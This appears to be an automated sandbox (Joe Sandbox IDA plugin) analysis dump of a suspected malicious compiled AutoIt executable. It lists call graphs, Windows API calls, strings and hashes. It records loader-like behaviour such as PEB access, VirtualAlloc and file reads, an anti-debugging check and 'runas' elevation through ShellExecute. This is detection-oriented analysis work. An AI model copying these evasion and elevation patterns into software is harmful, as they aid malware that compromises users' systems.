95308->95295 95309->95296 95310->95283 95311 4219cb 95316 3b2322 95311->95316 95313 4219d1 95349 3d0f0a 52 API calls __cinit 95313->95349 95315 4219db 95317 3b2344 95316->95317 95350 3b26df 95317->95350 95322 3bd7f7 48 API calls 95323 3b2384 95322->95323 95324 3bd7f7 48 API calls 95323->95324 95325 3b238e 95324->95325 95326 3bd7f7 48 API calls 95325->95326 95327 3b2398 95326->95327 95328 3bd7f7 48 API calls 95327->95328 95329 3b23de 95328->95329 95330 3bd7f7 48 API calls 95329->95330 95331 3b24c1 95330->95331 95358 3b263f 95331->95358 95335 3b24f1 95336 3bd7f7 48 API calls 95335->95336 95337 3b24fb 95336->95337 95387 3b2745 95337->95387 95339 3b2546 95340 3b2556 GetStdHandle 95339->95340 95341 3b25b1 95340->95341 95342 42501d 95340->95342 95343 3b25b7 CoInitialize 95341->95343 95342->95341 95344 425026 95342->95344 95343->95313 95394 3f92d4 53 API calls 95344->95394 95346 42502d 95395 3f99f9 CreateThread 95346->95395 95348 425039 CloseHandle 95348->95343 95349->95315 95396 3b2854 95350->95396 95353 3b6a63 48 API calls 95354 3b234a 95353->95354 95355 3b272e 95354->95355 95410 3b27ec 6 API calls 95355->95410 95357 3b237a 95357->95322 95359 3bd7f7 48 API calls 95358->95359 95360 3b264f 95359->95360 95361 3bd7f7 48 API calls 95360->95361 95362 3b2657 95361->95362 95411 3b26a7 95362->95411 95365 3b26a7 48 API calls 95366 3b2667 95365->95366 95367 3bd7f7 48 API calls 95366->95367 95368 3b2672 95367->95368 95369 3cf4ea 48 API calls 95368->95369 95370 3b24cb 95369->95370 95371 3b22a4 95370->95371 95372 3b22b2 95371->95372 95373 3bd7f7 48 API calls 95372->95373 95374 3b22bd 95373->95374 95375 3bd7f7 48 API calls 95374->95375 95376 3b22c8 95375->95376 95377 3bd7f7 48 API calls 95376->95377 95378 3b22d3 95377->95378 95379 3bd7f7 48 API calls 95378->95379 95380 3b22de 95379->95380 95381 3b26a7 48 API calls 95380->95381 95382 3b22e9 95381->95382 95383 3cf4ea 48 API calls 95382->95383 95384 3b22f0 95383->95384 95385 3b22f9 RegisterWindowMessageW 95384->95385 95386 421fe7 
95384->95386 95385->95335 95388 3b2755 95387->95388 95389 425f4d 95387->95389 95391 3cf4ea 48 API calls 95388->95391 95416 3fc942 50 API calls 95389->95416 95393 3b275d 95391->95393 95392 425f58 95393->95339 95394->95346 95395->95348 95417 3f99df 54 API calls 95395->95417 95403 3b2870 95396->95403 95399 3b2870 48 API calls 95400 3b2864 95399->95400 95401 3bd7f7 48 API calls 95400->95401 95402 3b2716 95401->95402 95402->95353 95404 3bd7f7 48 API calls 95403->95404 95405 3b287b 95404->95405 95406 3bd7f7 48 API calls 95405->95406 95407 3b2883 95406->95407 95408 3bd7f7 48 API calls 95407->95408 95409 3b285c 95408->95409 95409->95399 95410->95357 95412 3bd7f7 48 API calls 95411->95412 95413 3b26b0 95412->95413 95414 3bd7f7 48 API calls 95413->95414 95415 3b265f 95414->95415 95415->95365 95416->95392 95418 428eb8 95422 3fa635 95418->95422 95420 428ec3 95421 3fa635 84 API calls 95420->95421 95421->95420 95423 3fa66f 95422->95423 95427 3fa642 95422->95427 95423->95420 95424 3fa671 95434 3cec4e 81 API calls 95424->95434 95425 3fa676 95428 3b936c 81 API calls 95425->95428 95427->95423 95427->95424 95427->95425 95431 3fa669 95427->95431 95429 3fa67d 95428->95429 95430 3b510d 48 API calls 95429->95430 95430->95423 95433 3c4525 61 API calls ___crtGetEnvironmentStringsW 95431->95433 95433->95423 95434->95425 95435 1009e4b 95436 1009e60 95435->95436 95437 10074f0 GetPEB 95436->95437 95438 1009e6c 95437->95438 95439 1009f20 95438->95439 95440 1009e8a 95438->95440 95457 100a7d0 9 API calls 95439->95457 95444 1009b30 95440->95444 95443 1009f07 95445 10074f0 GetPEB 95444->95445 95446 1009bcf 95445->95446 95449 1009c29 VirtualAlloc 95446->95449 95454 1009c0d 95446->95454 95455 1009d30 CloseHandle 95446->95455 95456 1009d40 VirtualFree 95446->95456 95458 100aa40 GetPEB 95446->95458 95448 1009c00 CreateFileW 95448->95446 95448->95454 95450 1009c4a ReadFile 95449->95450 95449->95454 95453 1009c68 VirtualAlloc 95450->95453 95450->95454 95451 1009e2a 95451->95443 95452 1009e1c VirtualFree 

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 808b7f12edb009db1ee57083d95c60664adc1454a17e1cf78d7cd6050687d5bd
                                                                                • Instruction ID: aaa0a8c270004f62963632c1194b70ce70a918cee941164ccd2f8e1718bf4dc2
                                                                                • Opcode Fuzzy Hash: 808b7f12edb009db1ee57083d95c60664adc1454a17e1cf78d7cd6050687d5bd
                                                                                • Instruction Fuzzy Hash: 05324D76A02269CBCB26CF15EC416E9B7B5FF46310F5641DAE40AA7B81D7309E80CF52

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,003B3AA3,?), ref: 003B3D45
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,003B3AA3,?), ref: 003B3D57
                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00471148,00471130,?,?,?,?,003B3AA3,?), ref: 003B3DC8
                                                                                  • Part of subcall function 003B6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003B3DEE,00471148,?,?,?,?,?,003B3AA3,?), ref: 003B6471
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,003B3AA3,?), ref: 003B3E48
                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004628F4,00000010), ref: 00421CCE
                                                                                • SetCurrentDirectoryW.KERNEL32(?,00471148,?,?,?,?,?,003B3AA3,?), ref: 00421D06
                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0044DAB4,00471148,?,?,?,?,?,003B3AA3,?), ref: 00421D89
                                                                                • ShellExecuteW.SHELL32(00000000,?,?,?,?,003B3AA3), ref: 00421D90
                                                                                  • Part of subcall function 003B3E6E: GetSysColorBrush.USER32(0000000F), ref: 003B3E79
                                                                                  • Part of subcall function 003B3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 003B3E88
                                                                                  • Part of subcall function 003B3E6E: LoadIconW.USER32(00000063), ref: 003B3E9E
                                                                                  • Part of subcall function 003B3E6E: LoadIconW.USER32(000000A4), ref: 003B3EB0
                                                                                  • Part of subcall function 003B3E6E: LoadIconW.USER32(000000A2), ref: 003B3EC2
                                                                                  • Part of subcall function 003B3E6E: RegisterClassExW.USER32(?), ref: 003B3F30
                                                                                  • Part of subcall function 003B36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003B36E6
                                                                                  • Part of subcall function 003B36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003B3707
                                                                                  • Part of subcall function 003B36B8: ShowWindow.USER32(00000000,?,?,?,?,003B3AA3,?), ref: 003B371B
                                                                                  • Part of subcall function 003B36B8: ShowWindow.USER32(00000000,?,?,?,?,003B3AA3,?), ref: 003B3724
                                                                                  • Part of subcall function 003B4FFC: _memset.LIBCMT ref: 003B5022
                                                                                  • Part of subcall function 003B4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003B50CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                • String ID: ()F$This is a third-party compiled AutoIt script.$runas
                                                                                • API String ID: 438480954-192899200
                                                                                • Opcode ID: 85e340ace78b410d15b09136ca2677746a50fd3e45f4cd67e2d59314e48c7166
                                                                                • Instruction ID: 89162ee52257a5118e37ca5179ba039f820ccc663d7acb9d45dbdbdaa3e86ed6
                                                                                • Opcode Fuzzy Hash: 85e340ace78b410d15b09136ca2677746a50fd3e45f4cd67e2d59314e48c7166
                                                                                • Instruction Fuzzy Hash: 37514A31E04254AACF13ABB8EC42EED7B79EF18708F404036F7056A5A2DB784A45C725

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 003CDDEC
                                                                                • GetCurrentProcess.KERNEL32(00000000,0044DC38,?,?), ref: 003CDEAC
                                                                                • GetNativeSystemInfo.KERNELBASE(?,0044DC38,?,?), ref: 003CDF01
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 003CDF0C
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 003CDF1F
                                                                                • GetSystemInfo.KERNEL32(?,0044DC38,?,?), ref: 003CDF29
                                                                                • GetSystemInfo.KERNEL32(?,0044DC38,?,?), ref: 003CDF35
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                • String ID:
                                                                                • API String ID: 3851250370-0
                                                                                • Opcode ID: 6634190e1e9435613bb009e232d94ca56752297f83a71bc57bc37712395f3740
                                                                                • Instruction ID: a9431c673f9370bf8733165cb5468ee4a294899ded69d5eeb97f74f02f5b2da7
                                                                                • Opcode Fuzzy Hash: 6634190e1e9435613bb009e232d94ca56752297f83a71bc57bc37712395f3740
                                                                                • Instruction Fuzzy Hash: 8C61D4B190A394DFCF16DF6898C16EA7FB46F29300B1945EDE8859F207C664C908CB69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003B449E,?,?,00000000,00000001), ref: 003B407B
                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003B449E,?,?,00000000,00000001), ref: 003B4092
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,003B449E,?,?,00000000,00000001,?,?,?,?,?,?,003B41FB), ref: 00424F1A
                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,003B449E,?,?,00000000,00000001,?,?,?,?,?,?,003B41FB), ref: 00424F2F
                                                                                • LockResource.KERNEL32(003B449E,?,?,003B449E,?,?,00000000,00000001,?,?,?,?,?,?,003B41FB,00000000), ref: 00424F42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: SCRIPT
                                                                                • API String ID: 3051347437-3967369404
                                                                                • Opcode ID: c238d5239cd865b6eb765d161825d1502745cfb2139596147181bf5b81da5e14
                                                                                • Instruction ID: 6c8949dd46c61f25db37ab5a8f0460f38a85e262bc2a3cb8d7b2cb28e5047486
                                                                                • Opcode Fuzzy Hash: c238d5239cd865b6eb765d161825d1502745cfb2139596147181bf5b81da5e14
                                                                                • Instruction Fuzzy Hash: 42117970600701BFE7229B26EC48F67BBB9EBC5B55F20857CF612966A0DB71DC048A25
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,00422F49), ref: 003F6CB9
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003F6CCA
                                                                                • FindClose.KERNEL32(00000000), ref: 003F6CDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                • String ID:
                                                                                • API String ID: 48322524-0
                                                                                • Opcode ID: cd52ddf7e5c1bf83b58bc077c042581b14ee7c233762d21a70b63d1b99a5a117
                                                                                • Instruction ID: afebe4815fa79a7b8824f172cc405498465b119ccc03506f84aae5d1b8a956f4
                                                                                • Opcode Fuzzy Hash: cd52ddf7e5c1bf83b58bc077c042581b14ee7c233762d21a70b63d1b99a5a117
                                                                                • Instruction Fuzzy Hash: 76E0D831C144155786146738FC0E4F9376CDA05339F100725F5B1C11D0EB74D90046D9
                                                                                APIs
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003BE959
                                                                                • timeGetTime.WINMM ref: 003BEBFA
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003BED2E
                                                                                • TranslateMessage.USER32(?), ref: 003BED3F
                                                                                • DispatchMessageW.USER32(?), ref: 003BED4A
                                                                                • LockWindowUpdate.USER32(00000000), ref: 003BED79
                                                                                • DestroyWindow.USER32 ref: 003BED85
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003BED9F
                                                                                • Sleep.KERNEL32(0000000A), ref: 00425270
                                                                                • TranslateMessage.USER32(?), ref: 004259F7
                                                                                • DispatchMessageW.USER32(?), ref: 00425A05
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00425A19
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                • API String ID: 2641332412-570651680
                                                                                • Opcode ID: c59daaf686d80940ffd0fc3a784d0c85e78dea3e25f3532420c77aab1e3cc9c1
                                                                                • Instruction ID: fa79956a8d42684f36bf61d94ee99e08964d52005ec4a5c964e625174cb75874
                                                                                • Opcode Fuzzy Hash: c59daaf686d80940ffd0fc3a784d0c85e78dea3e25f3532420c77aab1e3cc9c1
                                                                                • Instruction Fuzzy Hash: 4162B470608340DFDB25DF28D885BEA77E4BF44308F44497EEA4A8B692DB74D848CB56
                                                                                APIs
                                                                                • ___createFile.LIBCMT ref: 003E5EC3
                                                                                • ___createFile.LIBCMT ref: 003E5F04
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003E5F2D
                                                                                • __dosmaperr.LIBCMT ref: 003E5F34
                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 003E5F47
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003E5F6A
                                                                                • __dosmaperr.LIBCMT ref: 003E5F73
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003E5F7C
                                                                                • __set_osfhnd.LIBCMT ref: 003E5FAC
                                                                                • __lseeki64_nolock.LIBCMT ref: 003E6016
                                                                                • __close_nolock.LIBCMT ref: 003E603C
                                                                                • __chsize_nolock.LIBCMT ref: 003E606C
                                                                                • __lseeki64_nolock.LIBCMT ref: 003E607E
                                                                                • __lseeki64_nolock.LIBCMT ref: 003E6176
                                                                                • __lseeki64_nolock.LIBCMT ref: 003E618B
                                                                                • __close_nolock.LIBCMT ref: 003E61EB
                                                                                  • Part of subcall function 003DEA9C: CloseHandle.KERNELBASE(00000000,0045EEF4,00000000,?,003E6041,0045EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003DEAEC
                                                                                  • Part of subcall function 003DEA9C: GetLastError.KERNEL32(?,003E6041,0045EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003DEAF6
                                                                                  • Part of subcall function 003DEA9C: __free_osfhnd.LIBCMT ref: 003DEB03
                                                                                  • Part of subcall function 003DEA9C: __dosmaperr.LIBCMT ref: 003DEB25
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                • __lseeki64_nolock.LIBCMT ref: 003E620D
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003E6342
                                                                                • ___createFile.LIBCMT ref: 003E6361
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003E636E
                                                                                • __dosmaperr.LIBCMT ref: 003E6375
                                                                                • __free_osfhnd.LIBCMT ref: 003E6395
                                                                                • __invoke_watson.LIBCMT ref: 003E63C3
                                                                                • __wsopen_helper.LIBCMT ref: 003E63DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                • String ID: @
                                                                                • API String ID: 3896587723-2766056989
                                                                                • Opcode ID: e8f0fa2173b1795a17febc34c22d4bac76b63666d09fb5a1d716649b79acadaf
                                                                                • Instruction ID: 4fc0645254dd4650c2dcec5f1e796a245c260ef40b4feef1f9c1aff159248c85
                                                                                • Opcode Fuzzy Hash: e8f0fa2173b1795a17febc34c22d4bac76b63666d09fb5a1d716649b79acadaf
                                                                                • Instruction Fuzzy Hash: EC2288719006A99FEF279F6ADC46BFE7B21EB20368F254329E5219B2D1C3358D40C791

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _wcscpy.LIBCMT ref: 003FFA96
                                                                                • _wcschr.LIBCMT ref: 003FFAA4
                                                                                • _wcscpy.LIBCMT ref: 003FFABB
                                                                                • _wcscat.LIBCMT ref: 003FFACA
                                                                                • _wcscat.LIBCMT ref: 003FFAE8
                                                                                • _wcscpy.LIBCMT ref: 003FFB09
                                                                                • __wsplitpath.LIBCMT ref: 003FFBE6
                                                                                • _wcscpy.LIBCMT ref: 003FFC0B
                                                                                • _wcscpy.LIBCMT ref: 003FFC1D
                                                                                • _wcscpy.LIBCMT ref: 003FFC32
                                                                                • _wcscat.LIBCMT ref: 003FFC47
                                                                                • _wcscat.LIBCMT ref: 003FFC59
                                                                                • _wcscat.LIBCMT ref: 003FFC6E
                                                                                  • Part of subcall function 003FBFA4: _wcscmp.LIBCMT ref: 003FC03E
                                                                                  • Part of subcall function 003FBFA4: __wsplitpath.LIBCMT ref: 003FC083
                                                                                  • Part of subcall function 003FBFA4: _wcscpy.LIBCMT ref: 003FC096
                                                                                  • Part of subcall function 003FBFA4: _wcscat.LIBCMT ref: 003FC0A9
                                                                                  • Part of subcall function 003FBFA4: __wsplitpath.LIBCMT ref: 003FC0CE
                                                                                  • Part of subcall function 003FBFA4: _wcscat.LIBCMT ref: 003FC0E4
                                                                                  • Part of subcall function 003FBFA4: _wcscat.LIBCMT ref: 003FC0F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                • String ID: >>>AUTOIT SCRIPT<<<$t2F
                                                                                • API String ID: 2955681530-332902988
                                                                                • Opcode ID: 63a9371033c15376daee46d1fb00d9ee6c48996927c369dd3532ffa03e31c7a3
                                                                                • Instruction ID: 6843ae42aced29bb832f27acd9d0f7e9d1ef63d52e7f93614d964024ef5114c8
                                                                                • Opcode Fuzzy Hash: 63a9371033c15376daee46d1fb00d9ee6c48996927c369dd3532ffa03e31c7a3
                                                                                • Instruction Fuzzy Hash: 8891B272504305AFDB12EF54C851FABB3E8BF44714F04486AFA599F2A1DB30EA44CB92

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 003FBDB4: __time64.LIBCMT ref: 003FBDBE
                                                                                  • Part of subcall function 003B4517: _fseek.LIBCMT ref: 003B452F
                                                                                • __wsplitpath.LIBCMT ref: 003FC083
                                                                                  • Part of subcall function 003D1DFC: __wsplitpath_helper.LIBCMT ref: 003D1E3C
                                                                                • _wcscpy.LIBCMT ref: 003FC096
                                                                                • _wcscat.LIBCMT ref: 003FC0A9
                                                                                • __wsplitpath.LIBCMT ref: 003FC0CE
                                                                                • _wcscat.LIBCMT ref: 003FC0E4
                                                                                • _wcscat.LIBCMT ref: 003FC0F7
                                                                                • _wcscmp.LIBCMT ref: 003FC03E
                                                                                  • Part of subcall function 003FC56D: _wcscmp.LIBCMT ref: 003FC65D
                                                                                  • Part of subcall function 003FC56D: _wcscmp.LIBCMT ref: 003FC670
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003FC2A1
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003FC338
                                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003FC34E
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003FC35F
                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003FC371
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                • String ID: p1Wu`KXu
                                                                                • API String ID: 2378138488-4063981602
                                                                                • Opcode ID: 74fb627f902787fb4d56de7fb76c40701ef4e54d8cbea78949a93de9f54dc043
                                                                                • Instruction ID: 3631239b2562e39f104af2a685018b2b1e94bafe89a7f93dba11f253ae30b73c
                                                                                • Opcode Fuzzy Hash: 74fb627f902787fb4d56de7fb76c40701ef4e54d8cbea78949a93de9f54dc043
                                                                                • Instruction Fuzzy Hash: 55C139B2D4021DABCF16DF95DD81EEEB7BDAF49300F0040AAF609EA151DB309A448F65

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 003B3F86
                                                                                • RegisterClassExW.USER32(00000030), ref: 003B3FB0
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003B3FC1
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 003B3FDE
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003B3FEE
                                                                                • LoadIconW.USER32(000000A9), ref: 003B4004
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003B4013
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
